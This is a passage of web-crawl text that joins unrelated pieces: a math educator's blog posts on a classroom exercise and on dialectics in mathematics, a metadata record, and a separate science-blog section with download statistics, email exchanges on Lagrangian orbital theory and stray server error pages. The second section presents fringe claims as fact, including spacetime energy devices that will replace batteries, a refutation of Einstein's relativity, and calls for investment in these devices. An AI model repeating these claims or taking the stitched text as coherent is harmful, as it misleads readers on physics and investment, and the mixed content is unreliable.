fanciest functions as most creative. Each section had some students come up with cos2(x)+sin2(x) as an answer, and some used logarithms, as in ln(e) or log10(10). And I’m glad those functions were there! It gave us a chance to talk a little about them and for me to give assurance that we would review them at an appropriate time. But 1/10+2/5+1/2 is much more personal, somehow, and I’d like it to have its due.\n• This kind of exercise was surprising and unfamiliar. I’m not quite sure how much time I gave for the creative process; I started out in my head with the idea of 2–3 minutes, but that clearly wasn’t enough, so it was probably 4–5. In that time, not everyone came up with ten solutions. (Which is fine! We’d spent an earlier part of the class watching Jo Boaler’s “Four Key Messages” video, which emphasizes that speed isn’t essential in learning math; a couple of students added that comment to their work.) I saw a few get stuck for a while, however, and next time I’ll have some ideas for how to gently prod.\n• The notion of “variable” is very strongly connected with “solving an equation”. The vast majority of students interpreted the direction “involve some kind of algebraic expression” to mean “write an equation whose solution is 1.” This led to answers like 2x=2 and x+3=4, and many others (one group gave log5(x)=0 as an answer!). There was a remarkable amount of creativity in the creation of these equations; I’d like to figure out how to leverage that. But now I also know that the distinction between an “expression” and an “equation” has not yet been made clear, and when we start simplifying algebraic expressions (e.g., to compute limits), we’ll still need to inject some flexibility into our thinking.\nThe main adjustments I would make next time are:\n• Rephrasing the instructions to say that the expressions simplify to 1, rather than equalling 1. Hopefully this will give clearer direction regarding algebraic expressions. Also, I would probably add an algebraic example like (x+1)–x.\n• Preparing, nonetheless, for a discussion about what the term “expression” means.\n• Giving a more definite and slightly longer period of time, and providing more useful interventions as the students do individual work.\n\nThat’s all for now. More updates as warranted.\n\nMonday, August 20, 2018\n\ndialectics in mathematics\n\nThis post is part of the Virtual Conference on Mathematical Flavors, and is part of a group thinking about different cultures within mathematics, and how those relate to teaching. Our group draws its initial inspiration from writing by mathematicians that describe different camps and cultures — from problem solvers and theorists, musicians and artists, explorers, alchemists and wrestlers, to “makers of patterns”. Are each of these cultures represented in the math curriculum? Do different teachers emphasize different aspects of mathematics? Are all of these ways of thinking about math useful when thinking about teaching, or are some of them harmful? These are the sorts of questions our group is asking. (intro by Michael Pershan)\n\nI want to talk about how we respond to polarities. Here I mean “polarity” in the philosophical sense (a pair of concepts that are apparently in conflict) rather than in a mathematical sense. When we encounter a struggle or tension between goals or ideas, we tend to create one of two things:\n\n• dichotomy — a conclusion that the two ideas are irreconcilable and the choosing of sides, or\n• synthesis — a selection of desirable features from each and the attempt to make those features coexist.\nWhile each approach is at times appropriate, both have their downsides. Establishing a dichotomy means that one side tends to be silenced and its contributions lost. Creating a synthesis can mean that neither side is fully honored; everything is compromise.\n\nI propose a third option, an alternative to dichotomy or synthesis: this approach is dialectic — upholding both sides fully, maintaining the two ideas in tension so that a conversation may arise between them. Etymologically, “dialectic” comes from the roots “dia” (“across”) and “logos” (“word” or “reason”), so its underlying meaning may be read as “speaking across a divide”. Dialectics can simply refer to discussion or debate between two opposing sides, but I use it to denote a state that seeks not resolution, but rather the fruitfulness of an irreducible struggle. Doing so acknowledges the worth, validity, and potency of both sides. It can therefore be used in the classroom to foster the inclusion of diverse perspectives, even in mathematics.\n\nOur group’s discussion began with an essay by Timothy Gowers entitled “The Two Cultures of Mathematics”. In this piece, Gowers makes the claim that most mathematicians are either “problem solvers”, who prefer to attack specific open problems that they believe are important, or “theory builders”, who prefer to develop a large, coherent body of understanding. The former are interested in general theory mainly insofar as it provides ways to solve their problems; the latter are interested in specific problems mainly insofar as they spur deeper insights or new directions for theory.\n\nThis subdivision is similar to the pure/applied separation we often talk about in mathematics, though it is not quite the same thing. Even the problems Gowers mentions fall well within the “pure” category. But these two polarities (pure/applied, theory/problems) share the feature that adherents of one side tends to be a bit snobbish towards those of the other.\n\nPure mathematicians tend to look on applied mathematics as, at best, a dirty form of math or, at worst, not truly math at all. G. H. Hardy, in his famous essay A Mathematician’s Apology, describes pure mathematics as more enduring, more exciting, and more “real” than applied mathematics. (He does make clear that what he considers “applied” mathematics limits itself to “elementary” tools, which more-or-less means grade-school arithmetic up through introductory calculus, and so his notion of applied mathematics might no longer suffice. I’ll get back to Hardy shortly.)\n\nGowers claims that, in a similar way, theory-building is currently “more fashionable” than problem-solving in the math world. (Rather than drawing the analogy with pure and applied mathematics, however, he compares this snobbishness with one, observed by C. P. Snow in “The Two Cultures”, held by humanities toward the sciences.) He laments that “this is not an entirely healthy state of affairs” and spends most of his essay defending problem-solving areas of math (combinatorics, in particular) against some perceived criticisms. His argument suggests to me that both the theory-building and the problem-solving camps should be upheld without one attempting to overcome the other; that is, a healthier state can be reached by sustaining a dialectic.\n\nHow can we think about theory-building vs. problem-solving in our classes?\n\nFor one thing, many of our students are trained problem-solvers. For them, learning mathematics means developing an appropriate response to any given stimulus. If a problem statement includes this-or-that word or phrase, then I should use such-and-such a technique to find a solution. For many of us instructors, however, it is the abstraction of ideas that drew us to mathematics. What is possible in this situation? To what extent can the possibilities be quantified and categorized? If theory-building is currently en vogue in mathematical culture, then I suspect we who teach are not immune to that trend. But here comes the question of motivation: what will draw students into doing mathematics? In many cases, the answer is… a problem. The problem may be “applied” (e.g., how does a population grow over time) or “pure” (e.g., how does the size of a square increase when its side length increases?), but a concrete connection provides an open door to considering broader mathematical truths. Such problems can lead into developing theory (e.g., what properties do exponential and polynomial functions share, and what distinguishes them?).\n\nBut developing theory for its own sake has been a part of mathematics since at least Euclid; we do our students a disservice if we neglect this aspect of doing math. A theory crystallizes into a single lattice ideas that might otherwise have been perceived as disconnected. Algebra in particular provides a unifying framework for solving individual problems. On the other hand, non-constructive statements are by turns inspiring and infuriating. It is no small movement from the (typically algebraic) claim that “A solution exists! And you can find it by following these steps…\" to the (typically analytic) claim that “A solution exists! And you may never find it exactly…” This theory in turn motivates a slew of new problems: if nothing else, how shall we find solutions as close to the true answer as we desire?\n\nIn any case, it is useful to abide by a constructivist view of knowledge: students will understand best the structures that they form in their own minds, whether by induction (problem-solving) or deduction (theory-building), and they should be presented with ample opportunities for both forms of construction.\n\n[Side note: in his keynote post for this series, Michael describes an occasion where he side-steps, or deconstructs, the theory-building/problem-solving divide by encouraging math-doers to create their own questions based on a simple prompt, questions which could easily veer in any direction, including problem-solving or theory-building.]\n\nIt is not hard to find other places in mathematics where polarities exist and a choice must be made: dichotomy, synthesis, or dialectic? A few weeks ago, I made a bit of a fuss on Twitter, claiming that everything Hardy wrote about mathematical culture should be read skeptically. The context for my criticism was an oft-shared quote from “A Mathematician’s Apology”: “Beauty is the first test: there is no permanent place in the world for ugly mathematics.”\n\nA question immediately presents itself: who decides what is beautiful? Any claim to objectivity is nearly always tied up with privilege. The answer cannot be “all mathematicians” because we all have such different tastes and preferences. Nor can the answer be “a special subset of mathematicians” because the choice of that subset will inevitably be determined by power structures within the mathematical community. But neither is the answer that all mathematics is equally beautiful. The standard of beauty may be subjective, but that does not mean it is arbitrary. We value beauty, but it is not the sole or even the primary standard by which we judge mathematics.\n\nHardy argues that all mathematics considered “useful” is essentially “dull” or “trivial”. He seeks to create a dichotomy between the beautiful and the practical. Perhaps he didn’t foresee the computing revolution. He couldn’t predict that number theory would be used in encryption, or that general relativity would be used for GPS, or that differential equations would be used for movie animations. Perhaps he would not consider these applications to be built on the deepest, truest parts of those theories. (To be fair, at the time he wrote, Hardy was distressed by the ways in which science had been used in the cause of warfare, and wanted to establish some distance between pure mathematics and that particular set of applications.)\n\nFrom an evangelistic perspective, potential converts (our students in particular) may be drawn in from either side: the aesthetic or the practical. I personally was first attracted to geometric form and the lovely, counterintuitive properties of mathematical relations. Some of my students have tastes similar to mine, but many more will be convinced of the predictive power of mathematics before they accept its inherent attractiveness.\n\nBeyond this, however, neither beauty nor usefulness can or should be subjugated to the other. Mathematics is grounded in both. They can hone each other, but they can also proceed independently. Progress flows from the pursuit of either. It would be a mistake, I believe, to claim that either is the true purpose of mathematics; we should support both of them in our minds and in our classrooms.\n\nNot every tension needs to be handled this way, but examples of dialectical pairings abound: precision and approximation, confidence and confusion, individual and community. I encourage us all to consider times when it can be productive not to resolve such conflicts but instead to foster a breadth of understanding from them.\n\nFriday, August 10, 2018\n\nsummer activities\n\nThis summer I had a fair amount of travel and conference/workshop activities. I’ve also been working on several projects that need finishing, and of course I have an eight-month old daughter. So I haven’t been blogging, even though several ideas for posts have been kicking around in my head. In order to get something posted, here’s a summary of some major events of the summer.\n\nIn May I taught a four-week session of “Transition to Abstract Mathematics”, our introduction-to-proofs course. I had seven students who worked very hard throughout the session. I was pleased that we were able to reach a point where the students could present results they selected from Proofs from THE BOOK during the final exam period.\n\nIn June I attended a program on “Teichmüller dynamics, mapping class groups and applications” at the Institut Fourier in Grenoble. (If any of those topics are of interest to you, videos of all the talks are available on YouTube.) I did not give a lecture, but I had a chance to talk with several people about work I did last summer with a Pepperdine student on the topic of “homothety” or “dilation” surfaces. Got a couple of more projects started during this time, to mix into the three or four I was already working on. ¯\\_(ツ)_/¯ It was also my first time visiting that part of France, so I traveled with family around the region. A couple of touristic highlights: tasting Chartreuse at the distillery in Voiron, and exploring the Citadel in Sisteron.\n\nIn July I participated in an IBL workshop run by the Academy of Inquiry-Based Learning. Four days with 25 enthusiastic teacher-learners and six fantastic facilitators. I started a set of IBL notes to use in the course on complex variables I’m teaching next spring and garnered several new tools and ideas for increasing student activity and engagement in the classroom.\n\nLast weekend I joined the mastery grading session at MathFest. Tons more ideas here! It’s great to be part of so many communities of people who are generating and sharing ideas big and small.\n\nI’ve promised to write at least one more blog post in the next week, for Sam Shah’s Virtual Conference on Mathematical Flavors. So it won’t be quite so long before I post again!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88302803,"math_prob":0.9612865,"size":11191,"snap":"2019-43-2019-47","text_gpt3_token_len":3249,"char_repetition_ratio":0.1418611,"word_repetition_ratio":0.023424428,"special_character_ratio":0.30113485,"punctuation_ratio":0.121811785,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98071027,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T15:31:40Z\",\"WARC-Record-ID\":\"<urn:uuid:3bca2fc6-fd1c-4223-9f37-09e793277fae>\",\"Content-Length\":\"150972\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4c1b95ad-4e23-48ab-889c-632834fce25e>\",\"WARC-Concurrent-To\":\"<urn:uuid:b7948c00-862c-4ad7-900e-80bf5ee9fbe1>\",\"WARC-IP-Address\":\"172.217.12.225\",\"WARC-Target-URI\":\"https://thalestriangles.blogspot.com/\",\"WARC-Payload-Digest\":\"sha1:6WR35MR5CRRTJP52WN5YI5WYCQM6YRU5\",\"WARC-Block-Digest\":\"sha1:FST46EENRRI5HXEHUWT7ERUXBU6LZO7E\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986696339.42_warc_CC-MAIN-20191019141654-20191019165154-00488.warc.gz\"}"}
http://aias.us/blog/index3df6.html?m=201703
[ "## Archive for March, 2017\n\n### My Civil List Predecessor Rowan Hamilton\n\nFriday, March 31st, 2017\n\nSir William Rowan Hamilton is known as Rowan Hamilton in Trinity College Dublin, of which I am sometime Visiting Academic. He was appointed to the Civil List on April 27th 1844 with a pension of £200 a year (about £22,319 a year today). My Civil List Pension is £2,400 a year, so it has been eroded a lot in value since 1844. It is now an honorarium rather than a salary to live on. The Civil List Pension is akin to Order of Merit. Hamilton was appointed Professor of Astronomy in Dublin at the age of twenty two and was considered to be one of the best mathematicians in the world at the age of 18. His papers “On a General Method of Dynamics” (1834 and 1835) gave the Hamilton Principle of Least Action and also what are known now as the Euler Lagrange equations. These were actually discovered by Hamilton using the Euler principle of 1744 and using some of Lagrange’s ideas of 1760. He also inferred the Hamilton or canonical equations, defined the lagrangian and inferred the hamiltonian, the basis of quantum mechanics. In UFT176, (www.aias.us and www.upitec.org) the Quantum Hamilton Equations are inferred, in what has become a classic paper. The Hamilton Principle of Least Action can be used in many branches of physics and mathematics.\n\n### Computations of 374(2) and 374(3): Precession Confirmed\n\nFriday, March 31st, 2017\n\nThis is an important remark, precession is still present. These will be very interesting as usual, there are many possible advances that can be made by using the equations of fluid dynamics in orbital theory: the continuity equation (conservation of matter); Navier Stokes equation; conservation of energy equation and vorticity equation. All of these add new equations to the set of simultaneous differential equations. I will write new notes on this theme.\n\nTo: [email protected]\nSent: 31/03/2017 08:35:03 GMT Daylight Time\nSubj: Re: Discussion of 374(2)\n\nMany thanks for these clarifications, I fully agree that fluid dynamic effects must be handled like a potential (i.e. as given properties) for the Lagrange mechanism. Using the correct momentum (28) will not give qualitative changes in the numerical solution because I used a constant spin connection, only the numbers will change.\nEqs. 43-44 c an be solved for any assumed radial function R_r(r). Eq. 45 does not enter the calculation, it would be interesting to see if the angular momentum is really conserved for non-constant functions R_r.\n\nHorst\n\nAm 29.03.2017 um 10:42 schrieb EMyrone:\n\nThese are interesting comments. This note is based entirely on standard equations of the Lagrange and Hamilton dynamics applied to vectors, notably Eq. (3), which gives the correct momentum p from the Lagrangian (2), these are all contained in Marion and Thornton. The vector Euler Lagrange equation is Eq. (11), and leads correctly to the well known equations (20) and (21), the Leibniz equation and the equation of constraint (21). The kinetic energy is p dot p / (2m). The primary purpose of the note is to show that the correct momentum must be defined by p bold = partial lagrangian / partial r dot bold (see for example Marion and Thornton). Eqs. (22) – (24) work correctly for classical dynamics, but no longer work correctly for fluid dynamics. The correct momentum of fluid dynamics must be calculated from eq. (3) using the lagrangian (35). The correct momentum is p bold = m v bold, where v bold is given by Eq. (26). This is the same as the momentum used in UFT363, and leads to Eqs. (33) and (34). The spin connection partial R sub r / partial r must be regarded in the same way as the potential energy U(r). Neither is a Lagrange variable. The key point is that the momentum p bold can be obtained correctly from the lagrangian (2) if and only if Eq. (3) is used. This is checked from the fact that p bold is r bold dot in Eq.(2). Then use the rules of differentiation with r dot bold. For classical dynamics, Eqns (22) to (24) happen to work fortuitously, and these are of course the equations used by Marion and Thornton in their chapter seven. However, for fluid dynamics they no longer work, because the complete momentum is now:\n\np bold = x r dot e sub r bold + r theta dot e sub theta bold\n\nwhere\nx = (1 + partial R sub r / partial r)\n\nUsing this in Eqs. (2) and (3) gives the correct momentum from the correct lagrangian, containing the correct kinetic energy. The correct momentum is Eq. (28) multiplied by m. When used in Eq. (29) it leads to to Eqs. (33) and (34). Eq. (33) is different from that found in UFT363, because in UFT363, the correct factor x in Eq. (33) turned out to be x squared, as in Eq. (39) of this note. Therefore the lagrangian (35) cannot be used with Eq. (38). This result is by no means obvious. It shows that there is a certain amount of subjectivity in the Lagrange method as is well known. It is by no means obvious how to choose the Lagrange variables, and the choice of lagrangian is also subjective to some degree. These things emerge in for example quantum field theory. Fortunately the answer is simple, use Eq. (13), in which there is only one Lagrange variable, vector r bold. This leads to Eqs. (33) and (34). I suggest putting Eqs. (43) to (45) through Maxima to see how the orbital precession behaves. I do not think that the replacement of x sqaured of UFT363 by the correct x of this note will make any qualitative difference to the precession that you have already inferred numerically. It might affect the details of the precession, but the precession will remain.\n\nTo: EMyrone\nSent: 28/03/2017 14:40:47 GMT Daylight Time\nSubj: Re: 374(2): Complete Analysis of UFT363\n\nIt is difficult for me to understand this note for principal reasons. My interpretation is the following:\n\nThe Lagrangian method is based on the kinetic energy and generalized coordinates. The Euler-Lagrange equations are based on the kinetic energy of the generalized coordinates. These coordinates are found by coordinate transformations. In our case the radial coordinate is transformed by\n\nr –> r + R_r(r)\n\nwhere R_r(r) is a “distortion” of radial motion of a particle inferred by fluid dynamics. For the Lagrange mechanism this function has to be known a priori, it cannot result from the Euler-Lagrange equations. If we assume that the R_r function is to be determined dynamically by the dynamics, we need an additional equation of motion or state or whatever. In Lagrange theory, energy conservation is fulfilled. This is not necessarily the case if a “free floating” function is introduced. I guess that you had this in mind when saying that a Hamiltonian formulation is needed in addition to the Lagrangian formulation to determined the dynamics consistently.\n\nSo the question is where to take the conditions for R_r that must appear as a constraint in the Lagrange mechanism. The generalized coordinates should be r and theta, but what is the kinetic energy? Let’s assmume that the velocity, eqs.(26,27) of the note, is that derived from the coordinate transformation. Then the Euler-Lagrange equations (33,34) are correct, although they contain an unspecified function R_r (which is not time dependent).\n\nI do not understand the part of the note after eqs.(33,34). Why do you introduce the Lagrangian (35)? Obviously this belongs to a different problem to be solved. And why should it be re-expressed to (36)? The momentum in Lagrange theory is a generalized momentum and needs not have the form (37).\n\nOn page 6 of the manuscript I cannot decipher the sentence “It is not possible to choose … as Lagrange varibles”. Which variables do you mean?\nEqs. (44) and (45) are derived from the same Euler-Lagrange equation and are not independent. It is true that (45) is a constant of motion but this is not suited for solving the equations because it is only of first order. What about using\n\nH = 1/2 m v^2 + U(r) = const.\n\ninstead? Then we can determine partial R_r/partial r , and replace it in (43,44) so that we have only derivatives of time and the equation system could be solved by Maxima for example. In general, combination of Lagrange theory (which is for mass points primarily) and fluid dynamics (which is for distributed fields) may be a bit tricky.\n\nSorry for having written such a long sermon today.\nHorst\n\nAm 28.03.2017 um 10:44 schrieb EMyrone:\n\nThis note shows that the complete Lagrangian and Hamiltonian formulations are needed to describe fluid dynamics self consistently. When this is done UFT363 is slighly corrected to Eqs. (43) to (45), which can be solved simultaneously using Maxima to give the orbit and spin connection.\n\n### Bosch Corporation Studying Energy from Spacetime Devices\n\nFriday, March 31st, 2017\n\nThis interest can be seen on the daily reports for today and yesterday. These can be based on the replicated and patented Osami Ide circuit (UFT311, UFT321 UFT364, Self Charging Inverter), which will bring in the second industrial revolution described by AIAS Fellow Dr. Steve Bannister in his Ph. D. Thesis on www.aias.us (Department of Economics, University of Utah). See also www.et3m.net and www.upitec.org. The Alex Hill company has recently signed a joint venture agreement with a company in the United States. I think that investment managers should be interested in this new industry. It should return a spectacular amount on investment. ECE theory describes the Osamu Ide circuit with precision (UFT311), whereas the obsolete standard model fails completely. See also the pulsed LENR report by AIAS Director Douglas Lindstrom on www.aias.us and his Idaho lecture. He is currently on a business trip to China, where there has been intense interest in ECE theory for some years. There are potentially huge new markets for spacetime devices all over the world. They could be used to power domestic appliances of the type manufactured by Bosch. They could also be made into power stations, large power plants, power devices for electric vehicles, power plants for ships and also aircraft and spacecraft, and should make the chemical battery industry obsolete. That is why Prof. Bannister describes them as powering the second industrial revolution. Wind turbines are already obsolete as well as completely useless. Governments should implement energy from spacetime devices as quickly as they can. They can also be distributed to the starving poor of many countries.\n\n### Daily Report 29/3/17\n\nFriday, March 31st, 2017\n\nThe equivalent of 81,576 printed pages was downloaded (297.426 megabytes) from 2,239 downloaded memory files and 406 distinct visits each averaging 3.9 memory pages and 6 minutes, printed pages to hits ratio of 36.43, to referrals total of 2,223,687, main spiders Google, MSN and Yahoo. Collected ECE2 1686, Top ten 1484, Collected Evans / Morris 957(est), F3(Sp) 630, Collected scientometrics 542, Principles of ECE 398, Barddoniaeth 232, Evans Equations 194, Collected Eckardt / Lindstrom papers 151(est), Autobiography volumes one and two 125, Collected Proofs 104, UFT88 89, Self charging inverter 84, Engineering Model 78, UFT311 76, Mann Johnson ECE 73, PLENR 59, ECE2 59, CEFE 54, Llais 44, Idaho 29, UFT321 22, UFT313 29, UFT314 19, UFT315 22, UFT316 17, UFT317 19, UFT318 13, UFT319 22, UFT320 16, UFT322 35, UFT323 20, UFT324 25, UFT325 32, UFT326 16, UFT327 21, UFT328 23, UFT329 20, UFT330 15, UFT331 20, UFT332 19, UFT333 16, UFT334 14, UFT335 36, UFT336 15, UFT337 14, UFT338 17, UFT339 16, UFT340 15, UFT341 31, UFT342 26, UFT343 31, UFT344 30, UFT345 27, UFT346 24, UFT347 46, UFT348 27, UFT349 25, UFT351 41, UFT352 52, UFT353 35, UFT354 63, UFT355 39, UFT356 42, UFT357 37, UFT358 38, UFT359 39, UFT360 31, UFT361 13, UFT362 25, UFT363 40, UFT364 36, UFT365 22, UFT366 59, UFT367 35, UFT368 35, UFT369 44, UFT370 48, UFT371 59, UFT372 31, UFT373 9 to date in March 2017. University of Adelaide Proof One; University of Oriente Santiago de Cuba UFT169(Sp); Bosch Company Germany Spacetime Devices; Deusu search engine Home Page; University of Baguio Philippines (on edu) general; Marine Hydrographic and Oceanographic Service France UFT351, UFT353, UFT357, UFT358; The Campaign for the Protection of Rural Wales Home Page; National Electrification authority Philippines general. Intense interest all sectors, updated usage file attached for March 2017.\n\n# Unauthorized\n\nThis server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn’t understand how to supply the credentials required.\n\nAdditionally, a 401 Unauthorized error was encountered while trying to use an ErrorDocument to handle the request.\n\n### 374(3): Equations for the Precessing Orbit of Fluid Gravitation\n\nThursday, March 30th, 2017\n\nIn the first instance, Eqs. (27) to (29) can be solved numerically using Maxima to check that the method gives the correct orbit (18). Then the algorithm can be modified to solve Eqs. (37), (38) and (40 numerically using a model for the function x defined in Eq. (31). Finally Eq. (44) can be added if the fluid is assumed to be incompressible, so both the orbit and x can be found. The caveat of this note explains why the note slightly corrects the equations of UFT363. The lagrangian method of UFT363 gives Eq. (47), which is different from the correct Eq. (37). The reason is that the kinetic energy of fluid gravitation, Eq. (48), is not in the required format (49) demanded by the Hamilton Principle of Least Action. The kinetic energy must be T(r bold dot, r bold). Sometimes it is simpler and clearer to derive results without the Lagrange method using both the Lagrange and Hamilton equations of motion.\n\na374thpapernotes3.pdf\n\n### Basics of the Lagrangian Method\n\nThursday, March 30th, 2017\n\nThe fundamental reason for the last note is that the Hamilton Principle of Least Action, from which is follows that the lagrangian must be defined as T(r bold dot) – U(r bold). I will explain this in another note to be distributed shortly. This method holds for any r bold dot. The method used in UFT363 did not satisfy the fundamental criterion for a lagrangian, which is why it did not lead to the correct momentum. The new method of UFT374 corrects this and leads to soluble sets of simultaneous partial differential equations. The new advance is that these can be tied in with the equations of hydrodynamics in many interesting ways. for background reading I suggest Marion and Thornton chapter five. So UFT374 will develop in this way. I recommend Marion and Thornton as far as it goes. It is now known that its section on the Einstein theory is wildly wrong. This was again shown by Horst’s numerical methods combined with analytical methods. Marion and Thornton is not easy, but is recommended reading. I remember doing lagrangian theory in the second year mathematics course at UCW Aberystwyth. It i snot easy, but sometimes useful. I have used it many times throughput my research career. Sometimes it is better to use other methods. The method of UFT374 uses all the available dynamics, Lagrangian and Hamiltonian. UFT176 on the discovery of the quantum Hamilton equations, is now a famous paper, a classic by any standards. There is a hugely successful combination of analytical and numerical techniques in each UFT paper, mainly by Horst Eckardt, Douglas Lindstrom and myself, and many contributions by other Fellows.\n\n### UFT88 read at Pierre et Marie Curie Astrophysics Institute\n\nThursday, March 30th, 2017\n\nUniversite Pierre et Marie Curie (Paris 6) is the best university in France at present. It is ranked 39 in the world by Shanghai, 121 by Times, 141 by QS and 175 by webometrics. It has 32,000 students on the Jussieu Campus of the Latin Quarter of Paris. The University of Paris is the second oldest on mainland Europe after Bologna founded in the second half of the twelfth century by Robert de Sorbon. The oldest university in Europe was Bangor Tewdos, founded in the fourth or fifth centuries, but completely destroyed by raiders. The Astrophysics Institute is situated next to the famous Paris Observatory and was founded in 1936, opening in 1952. UPMC is affiliated with the Sorbonne and CNRS. It includes the Institute Henri Poincare, where Jean-Pierre Vigier , co author of “The Enigmatic Photon”, Omnia Opera of www.aias.us) was a professor for many years, starting as an assistant to the Nobel Laureate Louis de Broglie. Vigier immediately accepted B(3) and probably nominated it for a Nobel Prize, or used his influence to have it recognized and nominated. UPMC has produced several famous Nobel Laureates, including Pierre Curie, Marie Curie (two Nobel Prizes), Henri Bequerel, Louis de Broglie, Frederic Joliot, Irene Joliot-Curie and Pierre Gilles de Gennes, whom I heard lecture on liquid crystals at Aberystwyth during a conference I helped organize. In the student risings of 1968 to 1970 there were prolonged clashes between the students and the police. The students occupied the Sorbonne and declared it an autonomous People’s Republic. This occurred when I was an undergraduate at Aberystwyth (1968 to 1971) as described in Autobiography Volume Two. The radical atmosphere of the Parisian student Rising pervaded the campus at Aberystwyth and also all the Campi in the United States after the Kent State shootings. UFT88 is a famous classic paper by now, it was published in 2007 and corrects the second Bianchi identity for torsion, leading to the complete geometrical refutation of the Einstein relativity and another revolution, the post Einsteinian paradigm shift in natural philosophy. So www.aias.us and www.upitec.org are read continuously at all the best universities in the world. The authorities of the old Ministry of Truth in physics try not to notice.\n\n### Daily Report 28/3/17\n\nThursday, March 30th, 2017\n\nThe equivalent of 93,405 printed pages was downloaded (340.556 megabytes) from 2,108 downloaded memory files (hits) and 424 distinct visits each averaging 4.4 memory pages and 6 minutes, printed pages to hits ratio of 44.31, top referrals total 2,223,504, main spiders Google, MSN and Yahoo. Collected ECE2 1606, Top ten 1546, Collected Evans / Morris 924(est), F3(Sp) 622, Collected scientometrics 520, Principles of ECE 394, Barddoniaeth 230, Evans Equations 191, Collected Eckardt / Lindstrom 151, Autobiography volumes one and two 124, Collected Proofs 98, UFT88 89, Self charging inverter 78, Engineering Model 77, Mann Johnson ECE 72, PLENR 58, ECE2 57, CEFE 51, Llais 43, UFT311 39, UFT321 21, UFT313 29, UFT314 16, UFT315 19, UFT316 15, UFT317 19, UFT318 12, UFT319 20, UFT320 15, UFT322 33, UFT323 19, UFT324 25, UFT325 32, UFT326 14, UFT327 21, UFT328 20, UFT329 19, UFT330 15, UFT331 20, UFT332 17, UFT333 16, UFT334 13, UFT335 32, UFT336 13, UFT337 14, UFT338 17, UFT339 14, UFT340 15, UFT341 31, UFT342 24, UFT343 28, UFT344 28, UFT345 25, UFT346 22, UFT347 43, UFT348 26, UFT349 23, UFT351 39, UFT352 50, UFT353 32, UFT354 61, UFT355 37, UFT356 40, UFT357 35, UFT358 35, UFT359 37, UFT360 30, UFT361 12, UFT362 25, UFT363 40, UFT364 33, UFT365 21, UFT366 57, UFT367 35, UFT368 33, UFT369 44, UFT370 48, UFT371 59, UFT372 31, UFT373 8 to date in March 2017. University of Adelaide UFT142; University of Quebec Trois Rivieres UFT366 – UFT373; Bosch Company Germany ECE Devices; Steinbuch Centre for Computing Karlsruhe Institute for Technology Home page, Three World records by MWE, Nomination, B. Sc. Degree Ceremony; Stanford University general; Institut d’Astrophysique de Paris (Astrohysics Institute of Paris, Joint research centre of Pierre and Marie Curie University and the National Centre for Scientific Research (CNRS)) UFT88; French National Hydrographic Service (SHOM) UFT349, UFT370, ECE2 preprint; Campaign fro the Protection of Rural Wales home page; Pakistan Education and Research Network general; University of Warwick Newspaper cuttings. Intense interest all sectors, updated usage file attached for March 2017.\n\n# Unauthorized\n\nThis server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn’t understand how to supply the credentials required.\n\nAdditionally, a 401 Unauthorized error was encountered while trying to use an ErrorDocument to handle the request.\n\n### Discussion of 374(2)\n\nWednesday, March 29th, 2017\n\nThese are interesting comments. This note is based entirely on standard equations of the Lagrange and Hamilton dynamics applied to vectors, notably Eq. (3), which gives the correct momentum p from the Lagrangian (2), these are all contained in Marion and Thornton. The vector Euler Lagrange equation is Eq. (11), and leads correctly to the well known equations (20) and (21), the Leibniz equation and the equation of constraint (21). The kinetic energy is p dot p / (2m). The primary purpose of the note is to show that the correct momentum must be defined by p bold = partial lagrangian / partial r dot bold (see for example Marion and Thornton). Eqs. (22) – (24) work correctly for classical dynamics, but no longer work correctly for fluid dynamics. The correct momentum of fluid dynamics must be calculated from eq. (3) using the lagrangian (35). The correct momentum is p bold = m v bold, where v bold is given by Eq. (26). This is the same as the momentum used in UFT363, and leads to Eqs. (33) and (34). The spin connection partial R sub r / partial r must be regarded in the same way as the potential energy U(r). Neither is a Lagrange variable. The key point is that the momentum p bold can be obtained correctly from the lagrangian (2) if and only if Eq. (3) is used. This is checked from the fact that p bold is r bold dot in Eq.(2). Then use the rules of differentiation with r dot bold. For classical dynamics, Eqns (22) to (24) happen to work fortuitously, and these are of course the equations used by Marion and Thornton in their chapter seven. However, for fluid dynamics they no longer work, because the complete momentum is now:\n\np bold = x r dot e sub r bold + r theta dot e sub theta bold\n\nwhere\nx = (1 + partial R sub r / partial r)\n\nUsing this in Eqs. (2) and (3) gives the correct momentum from the correct lagrangian, containing the correct kinetic energy. The correct momentum is Eq. (28) multiplied by m. When used in Eq. (29) it leads to to Eqs. (33) and (34). Eq. (33) is different from that found in UFT363, because in UFT363, the correct factor x in Eq. (33) turned out to be x squared, as in Eq. (39) of this note. Therefore the lagrangian (35) cannot be used with Eq. (38). This result is by no means obvious. It shows that there is a certain amount of subjectivity in the Lagrange method as is well known. It is by no means obvious how to choose the Lagrange variables, and the choice of lagrangian is also subjective to some degree. These things emerge in for example quantum field theory. Fortunately the answer is simple, use Eq. (13), in which there is only one Lagrange variable, vector r bold. This leads to Eqs. (33) and (34). I suggest putting Eqs. (43) to (45) through Maxima to see how the orbital precession behaves. I do not think that the replacement of x sqaured of UFT363 by the correct x of this note will make any qualitative difference to the precession that you have already inferred numerically. It might affect the details of the precession, but the precession will remain.\n\nTo: [email protected]\nSent: 28/03/2017 14:40:47 GMT Daylight Time\nSubj: Re: 374(2): Complete Analysis of UFT363\n\nIt is difficult for me to understand this note for principal reasons. My interpretation is the following:\n\nThe Lagrangian method is based on the kinetic energy and generalized coordinates. The Euler-Lagrange equations are based on the kinetic energy of the generalized coordinates. These coordinates are found by coordinate transformations. In our case the radial coordinate is transformed by\n\nr –> r + R_r(r)\n\nwhere R_r(r) is a “distortion” of radial motion of a particle inferred by fluid dynamics. For the Lagrange mechanism this function has to be known a priori, it cannot result from the Euler-Lagrange equations. If we assume that the R_r function is to be determined dynamically by the dynamics, we need an additional equation of motion or state or whatever. In Lagrange theory, energy conservation is fulfilled. This is not necessarily the case if a “free floating” function is introduced. I guess that you had this in mind when saying that a Hamiltonian formulation is needed in addition to the Lagrangian formulation to determined the dynamics 